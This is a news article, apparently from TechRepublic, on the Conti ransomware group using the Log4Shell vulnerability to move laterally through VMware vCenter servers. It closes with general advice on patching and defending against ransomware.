Log4Shell is the most severe vulnerability hitting systems in the end of 2021. Since its public exposure on the December 9, the security industry has worked hard to try to patch and protect against it. But sure enough, cybercriminals have started using it, and it was only a matter of time before one of the most active ransomware groups began to exploit it too.
What is the Log4Shell vulnerability?
The Log4Shell vulnerability (CVE-2021-44228) impacts the log4j Java library, which is used by a lot of software. Millions of systems worldwide use a vulnerable version of this library and are at risk.
Security provider Cloudflare says in a blog post that it’s seeing the exploitation pattern in log files up to 1,000 times per second.
What makes it so severe is that it allows an attacker to easily launch remote code on the machine running the vulnerable library. It does not take a lot of technical skills to exploit it, so it is accessible to really any kind of attacker, technically good or not.
SEE: NIST Cybersecurity Framework: A cheat sheet for professionals (free PDF) (TechRepublic)
AdvIntel reported that a week after the vulnerability became public, it started being used by one of the most prolific organized Russian-speaking ransomware groups: Conti.
The organization behind Conti ransomware is well structured. Its business model is to provide the Conti ransomware-as-a-service (RaaS). In this model, the cybercriminals operating Conti enable affiliates to use it as desired, provided that a percentage of the ransom payment is shared with them.
Between July and November 2021, the group is estimated to have received $25.5 million from ransom payments, according to cryptocurrency transactions investigations from Swiss company PRODAFT, while AdvIntel estimates that Conti made over $150 million in the last six months.
Conti uses the “double extortion” scheme: If companies do not pay the ransom, not only is their data lost, but it’s also exposed publicly on the internet or sold to competitors, since the group took care of exfiltrating all the encrypted data on its infrastructure.
Knowledge on the Conti group grew suddenly when one disgruntled affiliate of the structure suddenly leaked material from Conti. The leak contained documents mostly written in Cyrillic and exposed a full playbook to compromise companies and infect them with ransomware, making it uncomfortably easy for any hacker speaking the language, even with low security and network skills.
The Conti group seems to be keen on always finding new ways to infect companies and spread their ransomware, as they often have leveraged exploits as initial compromise vectors.
Using the Log4Shell vulnerability, the group specifically targeted VMware vCenter servers. The exploit was used to get access to the server and then be able to move laterally across the targeted company’s network. This is a notable difference compared to other exploits they might use: This one is dedicated to moving laterally inside the compromised network; the attackers have already successfully obtained initial access to the corporate network.
This is by far the biggest and most lucrative use of the Log4Shell vulnerability, since the consequences of its use might be more companies having their business being disrupted. Some of them will probably choose to pay the ransom to return to normal and not have their data exposed on the internet.
The cybercriminals might also think of other ways to exploit the Log4Shell vulnerability, as software other than vCenter is vulnerable, even for the initial compromise stage of their attacks.
SEE: Patch management policy (TechRepublic Premium)
How to protect yourself from the Log4Shell attacks
VMware already provided instructions to address the vulnerability in vCenter servers and vCenter Cloud Gateways.
A lot more software is vulnerable. It is advised to check regularly for updates on vulnerable products and patch or deploy workarounds as soon as possible. A comprehensive list of impacted software is provided by US CISA.
Log4Shell-specific testing software is provided by several security companies for IT staff who want to check whether their systems are impacted and can be used to detect vulnerable systems.
Cybereason offers a “vaccine” to prevent the vulnerability from being triggered, but it should be seen only as a temporary measure until all systems are patched.
How to protect yourself from ransomware
- Keep all systems and software up to date.
- Conduct security audits and fix whatever security problem appears.
- Perform regular backups, but keep them offline as much as possible, as ransomware is often looking for backup systems and destroying it.
- Reduce the attack surface by carefully disabling any protocol or system that is not needed. As an example, if FTP is not needed somewhere, disable it.
- Enable double factor authentication (2FA) whenever possible, especially for remote access connections.
- Restrict privileges of users to only the content they need to work.
- Use intrusion prevention systems (IPS) / intrusion detection systems (IDS).
- Run security awareness programs for all employees.
Disclosure: I work for Trend Micro, but the views expressed in this article are mine.